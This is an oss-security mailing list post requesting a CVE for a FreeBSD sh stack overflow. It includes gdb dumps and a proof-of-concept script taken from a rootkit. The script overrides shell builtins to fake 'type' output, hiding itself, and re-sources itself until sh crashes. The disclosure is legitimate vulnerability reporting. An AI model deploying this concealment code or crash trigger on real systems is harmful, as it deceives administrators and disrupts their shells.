Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Tue, 31 Mar 2015 18:42:01 +0800
From: wzt wzt <wzt.wzt@...il.com>
To: oss-security@...ts.openwall.com
Subject: CVE request: freebsd/sh stack overflow vulnerability

hi:
    I found sh have a stack overflow bug on freebsd(9.0-10.0),  it may be
triggered on all freebsd systems, but i have not tested yet. the poc below
is tested on freebsd10.0 amd64 arch:

$ ls
brootkit.sh
$ . brootkit.sh
$ command
$ ls
brootkit.sh     sh.core

(gdb) x/16x $rsp+0x1b8
0x7fffdfffeff8: Cannot access memory at address 0x7fffdfffeff8
(gdb) x/16x $rsp+0x1c0
0x7fffdffff000: 0x0000000000000000      0x0000000000000000
0x7fffdffff010: 0x0000000000000000      0x0000000000000000
0x7fffdffff020: 0x0000000000000000      0x0000000000000000
0x7fffdffff030: 0x0000000000000000      0x0000000000000000
0x7fffdffff040: 0x0000000000000000      0x0000000000000000
0x7fffdffff050: 0x0000000000000000      0x0000000000000000
0x7fffdffff060: 0x0000000000000000      0x0000000000000000
0x7fffdffff070: 0x0000000000000000      0x0000000000000000

(gdb) disass malloc malloc+32
Dump of assembler code from 0x800d593f0 to 0x800d59410:
0x0000000800d593f0 <malloc+0>:  push   %rbp
0x0000000800d593f1 <malloc+1>:  mov    %rsp,%rbp
0x0000000800d593f4 <malloc+4>:  push   %r15
0x0000000800d593f6 <malloc+6>:  push   %r14
0x0000000800d593f8 <malloc+8>:  push   %r13
0x0000000800d593fa <malloc+10>: push   %r12
0x0000000800d593fc <malloc+12>: push   %rbx
0x0000000800d593fd <malloc+13>: sub    $0x488,%rsp
0x0000000800d59404 <malloc+20>: mov    %rdi,-0x4a0(%rbp)
0x0000000800d5940b <malloc+27>: mov    0x2c2dbe(%rip),%rax        #
0x80101c1d0 <__nsdefaultsrc+4928>


set $i=0
set $addr=$rbp
while ($i <= 1000)
printf "frame[%d] 0x%lx ==> 0x%lx retaddr: 0x%lx\t diass: ", $i, $addr,
*(long *)$addr, *(long *)($addr+8)
x/i  *(long *)($addr+8)
set $i=$i+1
set $addr=*(long *)$addr
end

frame[98] 0x7fffe0004c00 ==> 0x7fffe0004d60 retaddr: 0x406465    diass:
0x406465 <execve@...+14073>:    incq   0x21d694(%rip)        # 0x623b00
<environ+64>
frame[99] 0x7fffe0004d60 ==> 0x7fffe0004e10 retaddr: 0x40513b    diass:
0x40513b <execve@...+9167>:     mov    -0x74(%rbp),%r14d
frame[100] 0x7fffe0004e10 ==> 0x7fffe0004ec0 retaddr: 0x405118   diass:
0x405118 <execve@...+9132>:     cmpl   $0x0,0x21e9f5(%rip)        #
0x623b14 <environ+84>

poc:

#!/bin/sh

BR_ROOTKIT_PATH="."

builtin()
{
        local fake_a

        unset command
        case $1 in
                "set"|"unset"|"command"|"type")
                        fake_a="$(command builtin $1 $2)"
                        br_hide_engine "$fake_a"
                        reset_command
                        return ;;
                "builtin")
                        echo "sh: builtin: builtin: syntax error, sh is not
support."
                        reset_command
                        return ;;
                *)
                        command builtin $1 $2
                        reset_command
                        ;;
        esac
}

type()
{
        case $1 in
                "builtin"|"set"|"unset"|"type")
                        echo "$1 is a shell builtin"
                        return ;;
                "dir")
                        echo "dir is /usr/bin/dir"
                        return ;;
                "ls")
                        echo "ls is aliased to ls --color=tty"
                        return ;;
                "ps")
                        echo "ps is /bin/ps"
                        return ;;
                "netstat")
                        echo "netstat is hashed (/usr/bin/netstat)"
                        return ;;
                "/bin/ls"|"/usr/bin/dir"|"/bin/ps"|"/usr/bin/netstat")
                        echo "$1 is $1"
                        return ;;
                *)
                        unset command
                        command type $1 $2
                        reset_command
                        return ;;
        esac
}

fake_unset()
{
        case $1 in
                "builtin"|"command"|"set"|"unset"|"type")
                        echo "sh: syntax error, sh is not support."
                        return ;;
                *)
                        unset $1 $2
                        return ;;
        esac
}

fake_command()
{
        case $1 in
                "builtin"|"command"|"set"|"unset"|"type")
                        echo "sh: syntax error, sh is not support."
                        return ;;
                *)
                        unset command
                        command $1 $2
                        reset_command
                        return ;;
        esac
}

command()
{
        case $1 in
                "builtin")
                        builtin $2 $3
                        return ;;
                "unset")
                        fake_unset $2 $3
                        . $BR_ROOTKIT_PATH/brootkit.sh
                        return ;;
                "type")
                        type $2 $3
                        return ;;
                "command")
                        fake_command $2 $3
                        return ;;
                *)
                        unset command
                        command $2 $3
                        . $BR_ROOTKIT_PATH/brootkit.sh
                        return ;;
        esac
}

reset_command()
{
        command()
        {
                case $1 in
                        "builtin")
                                builtin $2 $3
                                return ;;
                        "set")
                                set $2 $3
                                return ;;
                        "unset")
                                fake_unset $2 $3
                                . $BR_ROOTKIT_PATH/brootkit.sh
                                return ;;
                        "type")
                                type $2 $3
                                return ;;
                        "command")
                                fake_command $2 $3
                                return ;;
                        *)
                                unset command
                                command $2 $3
                                . $BR_ROOTKIT_PATH/brootkit.sh
                                return ;;
                esac
        }
}

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.